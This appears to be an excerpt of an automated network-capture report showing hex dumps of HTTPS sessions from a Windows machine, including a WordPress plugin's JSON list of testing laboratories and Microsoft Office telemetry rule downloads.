                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: fe 01 5f 56 59 fb 30 3c f4 b4 49 3a ba 2f 32 3e f9 a3 dd 5f 4f b2 27 89 80 a6 b5 cb 07 96 56 56 56 56 56 7b 65 af 0c ad b7 c1 2e ae ce 12 92 d5 1b 6d ef 90 60 8e 6d 3c dc d4 e6 a7 31 0d cc 31 59 0e e5 c5 74 ba 66 e9 cb 38 6e 3e b6 aa d1 e3 90 5a 8c bf 6b 42 8c 26 af f1 e7 2f 41 46 9e f1 d4 69 08 79 4c fb 90 6a c6 15 ab 2d a9 04 9c 7f a6 65 df 57 2a b4 bf ea fc 05 b6 3e af 5d 85 e3 eb 35 d0 b5 0f aa 57 6f 4d ff 00 e9 17 b0 df a9 37 02 93 ea 45 a9 53 78 b7 48 04 71 9b ab c9 ff 00 e8 97 8d c6 fd 4d b0 56 87 73 d7 e9 bc ef 7e 63 96 b4 ce a6 9d a1 bb 76 9b 3f ed f1 1e a2 dd f4 f8 71 db b4 cd 5b f6 f5 de 5a df d9 aa 4b f7 43 c3 07 15 b8 8f ec ba ef ba 1e 16 fb 59 c8 79 6f 67 c8 12 10 d0 62 5d 48 94 56 e3 84 7e a0 e4 6f cc 9d 66 77 2d ef 45 ef 2b 1f d8 f9 33 9f
                                                                                                                                          Data Ascii: _VY0<I:/2>_O'VVVVV{e.m`m<11Ytf8n>ZkB&/AFiyLj-eW*>]5WoM7ESxHqMVs~cv?q[ZKCYyogb]HV~ofw-E+3
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: d3 7e a3 a1 0f 92 74 dc 72 46 3b f9 99 69 2c 58 b6 56 2d de 96 26 5a 7c bf 6c b0 f6 d4 ee 37 14 42 1a fe d2 34 b4 09 0c 87 46 53 a9 75 66 24 99 55 28 a2 3c ec 44 72 8a 34 8e e4 ab a5 c9 3c 4a b7 42 6f af 53 5a 20 ae 47 5c 59 4a b5 c5 22 e5 f2 72 35 92 c4 c5 15 a5 e6 3b 8f 63 65 7f e5 cb f6 1e 4c 79 d2 7d 4a 1f cb 42 17 6e 39 df d0 cb b4 c5 da b9 72 e5 f7 dc b9 72 e5 f2 e8 5c b9 72 fb 6d dc 4b 75 48 dd 18 7a da 3a 3e 05 d4 51 2d b1 76 ac 5b 72 2e 26 2a ca ce 2f 27 35 14 54 a9 aa 4d 9a 8d 46 a3 51 a8 d4 6a 35 1a 8d 5d ca 8b ea c9 c6 ac aa 5a 9f b9 84 f0 87 cd 46 68 50 56 43 59 3c a8 4a fd 18 a3 62 b7 04 4b 0d 64 86 ec 29 17 b0 a5 71 33 15 87 f3 15 d7 23 e8 55 59 42 5a 79 3c f6 42 bc d1 47 19 fd c4 7a f5 ca 55 54 49 e2 57 b1 2a ec 94 ee 46 5e c6 91 a2 c6 91
                                                                                                                                          Data Ascii: ~trF;i,XV-&Z|l7B4FSuf$U(<Dr4<JBoSZ G\YJ"r5;ceLy}JBn9rr\rmKuHz:>Q-v[r.&*/'5TMFQj5]ZFhPVCY<JbKd)q3#UYBZy<BGzUTIW*F^
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 64 c0 85 d8 55 45 5b 05 0f d4 9c 7c f7 28 f5 30 ab e1 92 8a 97 66 75 5f a4 27 de 99 52 8c a9 be eb 76 38 50 a1 92 2f e9 22 b0 bd bc fc 09 88 76 7b 15 b5 0e 42 15 9b ed b7 c0 ac 88 cb b9 53 cd e9 cb 2a e9 10 88 e3 9f 07 ed e6 c8 f4 b3 1f 4d 22 54 a5 1b 3e 45 ed 1f 0a 17 b4 62 f7 0f 8a 53 fa 8c 59 3b e4 6c ae 8f bd 0e 32 46 19 4e 09 77 33 91 0e f9 14 da ee 8e 93 f5 57 f6 d4 ff 00 c9 09 26 8a 94 a3 35 86 8e a7 f4 9f 98 13 a5 28 79 de b7 d3 f2 53 5e e2 ab 15 98 c6 66 f9 1b 1c 8c 9a c4 c6 ef f2 60 c7 6d a8 94 af 46 5f 02 b7 4f 04 f2 28 a1 5d 12 2a ae e3 e4 56 cf b2 7c 2b da b1 7f 61 aa ec b7 4b c1 55 77 3d 33 c1 23 e0 8a 10 f6 60 d3 93 a0 a8 e3 1d 32 35 09 95 e8 c6 a7 93 a8 fd 39 c7 c1 28 38 ed 5b e9 90 5d bd c5 5f 22 b3 b7 91 db 51 ac 73 19 a4 4c 8c c5 2c 8a
                                                                                                                                          Data Ascii: dUE[|(0fu_'Rv8P/"v{BS*M"T>EbSY;l2FNw3W&5(yS^f`mF_O(]*V|+aKUw=3#`259(8[]_"QsL,
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 11 04 12 21 31 13 22 41 51 61 05 10 20 32 40 71 81 23 30 33 42 52 62 91 a1 b1 14 72 82 c1 d1 24 43 53 e1 06 15 34 50 63 92 a2 b2 35 44 60 73 f0 f1 c2 64 83 93 d2 25 54 84 e2 ff da 00 08 01 01 00 06 3f 02 f3 11 76 13 da 2c d6 26 e3 a6 3a 47 53 3a 37 04 40 a4 71 b7 ad 95 4f 04 34 b6 90 03 b2 8d a4 de 77 79 a2 37 bc 8b 0f 54 30 e2 7b f7 ac e8 06 cf e6 9a 24 88 9b d9 53 33 f1 55 2e 9a c7 68 ae 13 3a 30 f6 83 b0 3a 8c 35 0a 91 cd 14 d3 8e bb 21 ab 1c ea 7d c2 3e 6d 5a 27 c8 e0 e1 ea 4a 1b 27 ca 46 b0 aa c7 0c 11 1f 5a 4d 00 1f 31 50 bc 84 f4 9b 6b 63 76 3e 18 05 75 ec 91 e4 67 7c 1f c9 13 1b 2e 7f 9e 9f 55 84 90 87 0e 2e 6a bc f8 db 2f 16 ca b1 6c ad e2 08 2b fb 54 ac 3e f2 a0 b5 89 38 65 f5 40 13 1b 07 b5 99 44 4d ca 10 c7 4f 72 f2 a3 34 96 a7 6f c1 a1 5d b2
                                                                                                                                          Data Ascii: !1"AQa 2@q#03BRbr$CS4Pc5D`sd%T?v,&:GS:7@qO4wy7T0{$S3U.h:0:5!}>mZ'J'FZM1Pkcv>ug|.U.j/l+T>8e@DMOr4o]
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 4f 64 8f fe 71 ed 33 d3 6c 6c f5 7f 11 52 d9 2d 4c 12 7d b9 9f b6 b7 61 bd b3 f0 a8 ec 6f 93 4c c8 05 d8 1f ee ec 1e 1c ff 00 45 53 99 59 2c 96 4b 2e 96 4b aa ba ab 25 4a 52 26 fa 47 26 36 21 75 ad c2 9c c7 14 6d 93 65 fb b1 f9 a3 66 8d d4 60 eb 2c b9 aa 54 d1 8c d8 fa fc 55 a8 53 19 1b 79 a9 e6 61 9f 56 ab 55 09 a4 15 b3 59 75 9d c5 db 02 25 5c df 89 0b 5b bd c5 65 86 ce 71 82 17 a9 45 e4 c8 e3 45 8d 02 c6 5a 57 62 a5 f1 de ba cb 15 82 ce ab 0d aa 84 55 79 3d 6f 74 ad 68 dc d4 35 0f 35 0b 8e 2b 1c 78 aa 05 68 23 07 50 0a f4 6c 47 df fc 8f 4c 71 4f 1b 9e 7e bc c3 cd 14 7f e9 6b 83 33 99 58 f9 8e 3e 78 d1 51 aa ab 2f 1e 78 fb c0 67 de 27 3f 04 1b b3 67 36 0a f3 ba bb 06 ff 00 39 92 c9 64 a9 44 18 c1 40 9d c1 50 1c 53 2c cd 37 b6 c9 c0 29 24 7b 83 19 1b 13
                                                                                                                                          Data Ascii: Odq3llR-L}aoLESY,K.K%JR&G&6!umef`,TUSyaVUYu%\[eqEEZWbUy=oth55+xh#PlGLqO~k3X>xQ/xg'?g69dD@PS,7)${


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          59192.168.2.4498195.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:59 UTC576OUTGET /wp-content/plugins/lab-finder/labs.json?v=1732789978972 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:00 UTC304INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:00 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Thu, 20 Jun 2024 09:10:05 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 514046
                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                          Expires: Thu, 28 Nov 2024 10:33:00 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/json
                                                                                                                                          2024-11-28 10:33:00 UTC7888INData Raw: 5b 7b 22 69 64 22 3a 35 2c 22 6e 61 6d 65 22 3a 22 4c 2e 41 2e 42 2e 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 62 2d 73 6c 2e 63 6f 6d 22 2c 22 77 65 62 22 3a 22 6c 61 62 2d 73 6c 2e 63 6f 6d 22 2c 22 63 6f 6e 74 61 63 74 22 3a 22 4a 75 61 6e 20 52 61 6d 69 72 65 7a 20 43 61 73 73 69 6e 65 6c 6c 6f 20 7c 20 2b 33 34 20 36 37 32 20 33 38 35 20 38 36 33 20 7c 20 6a 72 61 6d 69 72 65 7a 40 6c 61 62 2d 73 6c 2e 63 6f 6d 22 2c 22 6c 61 62 5f 73 65 72 76 69 63 65 73 22 3a 22 22 2c 22 69 6e 64 75 73 74 72 69 65 73 22 3a 22 22 2c 22 73 70 65 63 69 61 6c 5f 73 65 72 76 69 63 65 73 22 3a 22 22 2c 22 69 6e 64 75 73 74 72 79 22 3a 5b 22 2a 22 2c 35 2c 31 2c 33 5d 2c 22 73 65 72 76 69 63 65 22 3a 5b 22 2a 22 2c 33 2c 32 2c 31 5d 2c 22 6c 61
                                                                                                                                          Data Ascii: [{"id":5,"name":"L.A.B.","url":"https://www.lab-sl.com","web":"lab-sl.com","contact":"Juan Ramirez Cassinello | +34 672 385 863 | jramirez@lab-sl.com","lab_services":"","industries":"","special_services":"","industry":["*",5,1,3],"service":["*",3,2,1],"la
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 65 64 69 75 6d 5f 6c 61 72 67 65 2d 68 65 69 67 68 74 22 3a 31 32 34 2c 22 6c 61 72 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 35 2f 32 30 32 34 2f 30 34 2f 4c 41 42 2d 4c 61 62 6f 72 61 74 6f 72 69 6f 2d 41 6c 6d 65 72 69 61 2d 31 2e 70 6e 67 22 2c 22 6c 61 72 67 65 2d 77 69 64 74 68 22 3a 32 30 30 2c 22 6c 61 72 67 65 2d 68 65 69 67 68 74 22 3a 31 32 34 2c 22 31 35 33 36 78 31 35 33 36 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 35 2f 32 30 32 34 2f 30 34 2f 4c 41 42 2d 4c 61 62 6f 72 61 74 6f 72
                                                                                                                                          Data Ascii: edium_large-height":124,"large":"https://www.tentamus-web.com/wp-content/uploads/sites/5/2024/04/LAB-Laboratorio-Almeria-1.png","large-width":200,"large-height":124,"1536x1536":"https://www.tentamus-web.com/wp-content/uploads/sites/5/2024/04/LAB-Laborator
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 38 2f 32 30 31 37 2f 30 32 2f 4c 61 62 47 72 6f 75 70 4c 6f 67 6f 73 5f 54 65 6e 74 61 43 68 69 6e 61 2d 33 30 30 78 31 31 31 2e 6a 70 67 22 2c 22 6d 65 64 69 75 6d 2d 77 69 64 74 68 22 3a 33 30 30 2c 22 6d 65 64 69 75 6d 2d 68 65 69 67 68 74 22 3a 31 31 31 2c 22 6d 65 64 69 75 6d 5f 6c 61 72 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 38 2f 32 30 31 37 2f 30 32 2f 4c 61 62 47 72 6f 75 70 4c 6f 67 6f 73 5f 54 65 6e 74 61 43 68 69 6e 61 2e 6a 70 67 22 2c 22 6d 65 64 69 75 6d 5f 6c 61 72 67 65 2d 77 69 64 74 68 22 3a 33
                                                                                                                                          Data Ascii: us-web.com/wp-content/uploads/sites/8/2017/02/LabGroupLogos_TentaChina-300x111.jpg","medium-width":300,"medium-height":111,"medium_large":"https://www.tentamus-web.com/wp-content/uploads/sites/8/2017/02/LabGroupLogos_TentaChina.jpg","medium_large-width":3
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 64 20 50 68 61 72 6d 61 22 2c 22 69 6e 64 75 73 74 72 79 22 3a 5b 22 2a 22 2c 31 5d 2c 22 73 65 72 76 69 63 65 22 3a 5b 22 2a 22 2c 35 2c 34 2c 33 2c 31 2c 32 5d 2c 22 6c 61 6e 67 22 3a 22 64 65 5f 44 45 22 2c 22 72 65 6c 61 74 65 64 22 3a 7b 22 65 6e 5f 55 53 22 3a 35 32 2c 22 65 73 5f 45 53 22 3a 35 34 7d 2c 22 6f 70 74 69 6f 6e 73 22 3a 7b 22 61 64 72 65 73 73 22 3a 22 3c 70 3e 3c 73 70 61 6e 3e 51 53 49 20 47 6d 62 48 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 5c 6e 3c 73 70 61 6e 3e 46 6c 75 67 68 61 66 65 6e 64 61 6d 6d 20 39 61 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 5c 6e 3c 73 70 61 6e 3e 32 38 31 39 39 20 42 72 65 6d 65 6e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 5c 6e 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 39 65 33 33 36 61 22
                                                                                                                                          Data Ascii: d Pharma","industry":["*",1],"service":["*",5,4,3,1,2],"lang":"de_DE","related":{"en_US":52,"es_ES":54},"options":{"adress":"<p><span>QSI GmbH</span><br />\n<span>Flughafendamm 9a</span><br />\n<span>28199 Bremen</span></p>\n","background_color":"#9e336a"
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 7a 69 61 6c 6c 5c 75 30 30 66 36 73 75 6e 67 65 6e 2c 20 64 69 65 20 6b 65 69 6e 65 20 57 5c 75 30 30 66 63 6e 73 63 68 65 20 6f 66 66 65 6e 20 6c 61 73 73 65 6e 2e 3c 2f 70 3e 5c 6e 3c 70 20 61 6c 69 67 6e 3d 5c 22 6a 75 73 74 69 66 79 5c 22 3e 44 75 72 63 68 20 75 6e 73 65 72 65 20 65 69 6e 7a 69 67 61 72 74 69 67 65 20 46 75 6c 6c 2d 53 65 72 76 69 63 65 2d 55 6e 74 65 72 6e 65 68 6d 65 6e 73 76 65 72 62 75 6e 64 20 75 6e 74 65 72 20 64 65 6d 20 44 61 63 68 20 64 65 72 20 54 65 6e 74 61 6d 75 73 20 73 69 6e 64 20 77 69 72 20 69 6e 20 64 65 72 20 4c 61 67 65 20 64 69 65 20 6b 6f 6d 70 6c 65 74 74 65 20 44 4e 41 2d 41 6e 61 6c 79 74 69 6b 20 75 6e 64 20 69 6e 6e 6f 76 61 74 69 76 65 20 4c 5c 75 30 30 66 36 73 75 6e 67 65 6e 20 66 5c 75 30 30 66 63 72 20
                                                                                                                                          Data Ascii: ziall\u00f6sungen, die keine W\u00fcnsche offen lassen.</p>\n<p align=\"justify\">Durch unsere einzigartige Full-Service-Unternehmensverbund unter dem Dach der Tentamus sind wir in der Lage die komplette DNA-Analytik und innovative L\u00f6sungen f\u00fcr
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 5c 22 3e 26 23 38 32 32 30 3b 41 6e 74 69 6d 69 63 72 6f 62 69 61 6c 20 41 63 74 69 76 69 74 69 65 73 20 6f 66 20 41 6d 69 6e 65 2d 20 61 6e 64 20 47 75 61 6e 69 64 69 6e 65 2d 46 75 6e 63 74 69 6f 6e 61 6c 69 7a 65 64 20 43 68 6f 6c 69 63 20 41 63 69 64 20 44 65 72 69 76 61 74 69 76 65 73 2e 26 23 38 32 32 31 3b 3c 2f 61 3e 3c 2f 70 3e 5c 6e 3c 70 3e 3c 73 70 61 6e 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 77 65 20 61 72 65 20 61 20 66 6f 75 6e 64 69 6e 67 20 6d 65 6d 62 65 72 20 6f 66 20 4e 75 74 72 61 63 65 75 74 69 63 61 6c 20 61 6e 64 20 49 6e 64 75 73 74 72 69 61 6c 20 4d 69 63 72 6f 62 69 6f 6c 6f 67 69 73 74 73 20 6f 66 20 55 74 61 68 20 28 4e 49 4d
                                                                                                                                          Data Ascii: target=\"_blank\" rel=\"noopener\">&#8220;Antimicrobial Activities of Amine- and Guanidine-Functionalized Cholic Acid Derivatives.&#8221;</a></p>\n<p><span>Additionally, we are a founding member of Nutraceutical and Industrial Microbiologists of Utah (NIM
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 31 36 2f 32 30 32 30 2f 30 36 2f 63 6f 6c 75 6d 62 69 61 2d 6c 61 62 6f 72 61 74 6f 72 69 65 73 2d 70 72 65 73 73 65 62 6f 78 2d 65 31 35 39 31 31 38 38 31 32 31 33 34 30 2e 6a 70 67 22 2c 22 32 30 34 38 78 32 30 34 38 2d 77 69 64 74 68 22 3a 37 30 30 2c 22 32 30 34 38 78 32 30 34 38 2d 68 65 69 67 68 74 22 3a 32 32 39 2c 22 6e 65 77 73 2d 74 68 75 6d 62 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 31 36 2f 32 30 32 30 2f 30 36 2f 63 6f 6c 75 6d 62 69 61 2d 6c 61 62 6f 72 61 74 6f 72 69 65 73 2d 70 72 65 73 73 65 62 6f 78 2d 33 35 30 78 32 33 36 2e 6a 70 67 22 2c 22 6e 65 77 73
                                                                                                                                          Data Ascii: ent/uploads/sites/16/2020/06/columbia-laboratories-pressebox-e1591188121340.jpg","2048x2048-width":700,"2048x2048-height":229,"news-thumb":"https://www.tentamus-web.com/wp-content/uploads/sites/16/2020/06/columbia-laboratories-pressebox-350x236.jpg","news
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 22 6d 6f 64 69 66 69 65 64 22 3a 22 32 30 31 39 2d 30 31 2d 32 32 20 31 32 3a 30 31 3a 35 30 22 2c 22 6d 65 6e 75 5f 6f 72 64 65 72 22 3a 30 2c 22 6d 69 6d 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 2f 70 6e 67 22 2c 22 74 79 70 65 22 3a 22 69 6d 61 67 65 22 2c 22 73 75 62 74 79 70 65 22 3a 22 70 6e 67 22 2c 22 69 63 6f 6e 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 73 2d 61 6e 61 6c 79 74 69 6b 2e 64 65 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 69 6d 61 67 65 73 2f 6d 65 64 69 61 2f 64 65 66 61 75 6c 74 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a 37 32 34 2c 22 68 65 69 67 68 74 22 3a 33 31 37 2c 22 73 69 7a 65 73 22 3a 7b 22 74 68 75 6d 62 6e 61 69 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70
                                                                                                                                          Data Ascii: "modified":"2019-01-22 12:01:50","menu_order":0,"mime_type":"image/png","type":"image","subtype":"png","icon":"https://www.bls-analytik.de/wp-includes/images/media/default.png","width":724,"height":317,"sizes":{"thumbnail":"https://www.tentamus-web.com/wp
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 68 74 20 66 5c 75 30 30 66 63 72 20 53 63 68 6e 65 6c 6c 69 67 6b 65 69 74 2c 20 7a 75 76 65 72 6c 5c 75 30 30 65 34 73 73 69 67 65 20 45 72 67 65 62 6e 69 73 73 65 20 75 6e 64 20 46 6c 65 78 69 62 69 6c 69 74 5c 75 30 30 65 34 74 2e 20 44 69 65 73 20 65 72 72 65 69 63 68 65 6e 20 77 69 72 20 64 75 72 63 68 20 68 6f 68 65 20 53 70 65 7a 69 61 6c 69 73 69 65 72 75 6e 67 2c 20 6b 6f 6d 70 65 74 65 6e 74 65 20 4d 69 74 61 72 62 65 69 74 65 72 20 75 6e 64 20 6c 61 6e 67 6a 5c 75 30 30 65 34 68 72 69 67 65 20 45 72 66 61 68 72 75 6e 67 2e 20 41 6c 73 20 4d 69 74 67 6c 69 65 64 20 64 65 72 20 54 65 6e 74 61 6d 75 73 2d 4c 61 62 6f 72 65 20 62 69 65 74 65 6e 20 77 69 72 20 49 68 6e 65 6e 20 67 6c 65 69 63 68 7a 65 69 74 69 67 20 65 69 6e 65 20 62 72 65 69 74 65
                                                                                                                                          Data Ascii: ht f\u00fcr Schnelligkeit, zuverl\u00e4ssige Ergebnisse und Flexibilit\u00e4t. Dies erreichen wir durch hohe Spezialisierung, kompetente Mitarbeiter und langj\u00e4hrige Erfahrung. Als Mitglied der Tentamus-Labore bieten wir Ihnen gleichzeitig eine breite
                                                                                                                                          2024-11-28 10:33:00 UTC8000INData Raw: 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 32 31 2f 32 30 31 37 2f 30 32 2f 4c 6f 67 6f 5f 5f 30 30 31 30 5f 42 41 56 2e 6a 70 67 22 2c 22 6d 65 64 69 75 6d 5f 6c 61 72 67 65 2d 77 69 64 74 68 22 3a 33 30 30 2c 22 6d 65 64 69 75 6d 5f 6c 61 72 67 65 2d 68 65 69 67 68 74 22 3a 31 31 31 2c 22 6c 61 72 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2d 77 65 62 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 73 69 74 65 73 2f 32 31 2f 32 30 31 37 2f 30 32 2f 4c 6f 67 6f 5f 5f 30 30 31 30 5f 42 41 56 2e 6a 70 67 22 2c 22 6c 61 72 67 65 2d 77 69 64 74 68 22 3a 33 30 30 2c 22 6c 61 72 67 65 2d 68 65 69 67 68 74 22 3a 31 31 31 2c 22 31 35 33 36 78 31 35 33 36 22
                                                                                                                                          Data Ascii: b.com/wp-content/uploads/sites/21/2017/02/Logo__0010_BAV.jpg","medium_large-width":300,"medium_large-height":111,"large":"https://www.tentamus-web.com/wp-content/uploads/sites/21/2017/02/Logo__0010_BAV.jpg","large-width":300,"large-height":111,"1536x1536"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          60192.168.2.44982313.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:00 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:00 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 2160
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                          ETag: "0x8DC582BA3B95D81"
                                                                                                                                          x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103300Z-174f7845968pf68xhC1EWRr4h80000000ygg000000006nu0
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:00 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          61192.168.2.44982213.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:00 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:00 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 2980
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                                          x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103300Z-174f7845968cdxdrhC1EWRg0en0000000y50000000009upq
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
